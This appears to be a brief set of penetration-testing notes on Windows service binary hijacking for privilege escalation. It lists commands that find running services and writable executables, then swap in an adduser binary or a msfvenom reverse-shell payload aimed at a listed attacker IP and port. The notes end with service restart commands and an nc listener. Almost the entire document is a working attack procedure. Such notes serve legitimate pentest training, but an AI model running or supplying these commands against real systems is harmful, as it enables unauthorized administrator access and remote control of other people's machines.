# Service Binary hijacking

## Service Binary hijacking

* check programs on scheduled tasks
  * schtasks /query /fo LIST /v
  * Get-CimInstance -ClassName win32\_service | Select Name,State,PathName | Where-Object {$\_.State -like 'Running'}
* Check permission (full or writable) of programs found
  * icacls \<full-path>
  * icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
* transfer any adduser.exe executable and rename it with exploitable exe name
  * OR msfvenom -p windows/x64/shell\_reverse\_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe
* sc.exe stop \<service-name>
* sc.exe start \<service-name>
* nc -nvlp 139 if reverse shell exe is used